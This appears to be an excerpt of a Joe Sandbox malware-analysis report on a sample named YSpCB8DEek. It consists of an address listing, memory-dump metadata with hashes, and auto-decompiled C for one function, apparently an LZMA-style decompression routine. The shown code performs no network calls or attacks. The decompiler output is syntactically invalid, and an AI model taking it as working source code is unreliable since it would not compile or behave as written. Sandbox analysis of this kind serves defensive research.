                            0x00407493
                            0x0040749a
                            0x00000000
                            0x00000000
                            0x0040749f
                            0x0040749f
                            0x004074a3
                            0x004075db
                            0x00000000
                            0x004075db
                            0x004074a9
                            0x004074ac
                            0x004074af
                            0x004074b3
                            0x004074b6
                            0x004074bc
                            0x004074be
                            0x004074be
                            0x004074be
                            0x004074c1
                            0x004074c4
                            0x004074c4
                            0x004074c4
                            0x004074c4
                            0x004074c7
                            0x004074c7
                            0x004074cb
                            0x0040752b
                            0x0040752e
                            0x00407533
                            0x00407534
                            0x00407536
                            0x00407538
                            0x0040753b
                            0x00407447
                            0x00407447
                            0x00000000
                            0x0040744d
                            0x00407447
                            0x004074cd
                            0x004074d3
                            0x004074d6
                            0x004074d9
                            0x004074dc
                            0x004074df
                            0x004074e2
                            0x004074e5
                            0x004074e8
                            0x004074eb
                            0x004074ee
                            0x00407507
                            0x0040750a
                            0x0040750d
                            0x00407510
                            0x00407514
                            0x00407516
                            0x00407516
                            0x00407517
                            0x0040751a
                            0x004074f0
                            0x004074f0
                            0x004074f8
                            0x004074fd
                            0x004074ff
                            0x00407502
                            0x00407502
                            0x0040751d
                            0x00407524
                            0x00000000
                            0x00407526
                            0x00000000
                            0x00407526
                            0x00000000
                            0x004071c2
                            0x004071c5
                            0x004071fb
                            0x0040732b
                            0x0040732b
                            0x0040732b
                            0x0040732b
                            0x0040732e
                            0x0040732e
                            0x00407331
                            0x00407333
                            0x004075bd
                            0x00000000
                            0x004075bd
                            0x00407339
                            0x0040733c
                            0x00000000
                            0x00000000
                            0x00407342
                            0x00407346
                            0x00407349
                            0x00407349
                            0x00407349
                            0x00000000
                            0x00407349
                            0x004071c7
                            0x004071c9
                            0x004071cb
                            0x004071cd
                            0x004071d0
                            0x004071d1
                            0x004071d3
                            0x004071d5
                            0x004071d8
                            0x004071db
                            0x004071f1
                            0x004071f6
                            0x0040722e
                            0x0040722e
                            0x00407232
                            0x0040725e
                            0x00407260
                            0x00407267
                            0x0040726a
                            0x0040726d
                            0x0040726d
                            0x00407272
                            0x00407272
                            0x00407274
                            0x00407277
                            0x0040727e
                            0x00407281
                            0x004072ae
                            0x004072ae
                            0x004072b1
                            0x004072b4
                            0x00407328
                            0x00407328
                            0x00407328
                            0x00000000
                            0x00407328
                            0x004072b6
                            0x004072bc
                            0x004072bf
                            0x004072c2
                            0x004072c5
                            0x004072c8
                            0x004072cb
                            0x004072ce
                            0x004072d1
                            0x004072d4
                            0x004072d7
                            0x004072f0
                            0x004072f2
                            0x004072f5
                            0x004072f6
                            0x004072f9
                            0x004072fb
                            0x004072fe
                            0x00407300
                            0x00407302
                            0x00407305
                            0x00407307
                            0x0040730a
                            0x0040730e
                            0x00407310
                            0x00407310
                            0x00407311
                            0x00407314
                            0x00407317
                            0x004072d9
                            0x004072d9
                            0x004072e1
                            0x004072e6
                            0x004072e8
                            0x004072eb
                            0x004072eb
                            0x0040731a
                            0x00407321
                            0x004072ab
                            0x004072ab
                            0x004072ab
                            0x004072ab
                            0x00000000
                            0x00407323
                            0x00000000
                            0x00407323
                            0x00407321
                            0x00407234
                            0x00407237
                            0x00407239
                            0x0040723c
                            0x0040723f
                            0x00407242
                            0x00407244
                            0x00407247
                            0x0040724a
                            0x0040724a
                            0x0040724d
                            0x0040724d
                            0x00407250
                            0x00407257
                            0x0040722b
                            0x0040722b
                            0x0040722b
                            0x0040722b
                            0x00000000
                            0x00407259
                            0x00000000
                            0x00407259
                            0x00407257
                            0x004071dd
                            0x004071e0
                            0x004071e2
                            0x004071e5
                            0x00000000
                            0x00000000
                            0x00406f44
                            0x00406f44
                            0x00406f48
                            0x0040758d
                            0x00000000
                            0x0040758d
                            0x00406f4e
                            0x00406f51
                            0x00406f54
                            0x00406f57
                            0x00406f5a
                            0x00406f5d
                            0x00406f60
                            0x00406f62
                            0x00406f65
                            0x00406f68
                            0x00406f6b
                            0x00406f6d
                            0x00406f6d
                            0x00406f6d
                            0x00000000
                            0x00000000
                            0x004070cf
                            0x004070cf
                            0x004070d3
                            0x00407599
                            0x00000000
                            0x00407599
                            0x004070d9
                            0x004070dc
                            0x004070df
                            0x004070e2
                            0x004070e4
                            0x004070e4
                            0x004070e4
                            0x004070e7
                            0x004070ea
                            0x004070ed
                            0x004070f0
                            0x004070f3
                            0x004070f6
                            0x004070f7
                            0x004070f9
                            0x004070f9
                            0x004070f9
                            0x004070fc
                            0x004070ff
                            0x00407102
                            0x00407105
                            0x00407105
                            0x00407105
                            0x00407108
                            0x0040710a
                            0x0040710a
                            0x00000000
                            0x00000000
                            0x0040734c
                            0x0040734c
                            0x0040734c
                            0x00407350
                            0x00000000
                            0x00000000
                            0x00407356
                            0x00407359
                            0x0040735c
                            0x0040735f
                            0x00407361
                            0x00407361
                            0x00407361
                            0x00407364
                            0x00407367
                            0x0040736a
                            0x0040736d
                            0x00407370
                            0x00407373
                            0x00407374
                            0x00407376
                            0x00407376
                            0x00407376
                            0x00407379
                            0x0040737c
                            0x0040737f
                            0x00407382
                            0x00407385
                            0x00407389
                            0x0040738b
                            0x0040738e
                            0x00000000
                            0x00407390
                            0x0040710d
                            0x0040710d
                            0x00000000
                            0x0040710d
                            0x0040738e
                            0x004075c3
                            0x00000000
                            0x00000000
                            0x00406bf2
                            0x004075fa
                            0x004075fa
                            0x00000000
                            0x004075fa
                            0x00407447
                            0x004073ce
                            0x004073cb
                            0x00000000
                            0x00407002

                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                            • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                            • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                            • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040711C Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                            Download Yara Rule
                            C-Code - Quality: 98%
                            			E0040711C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
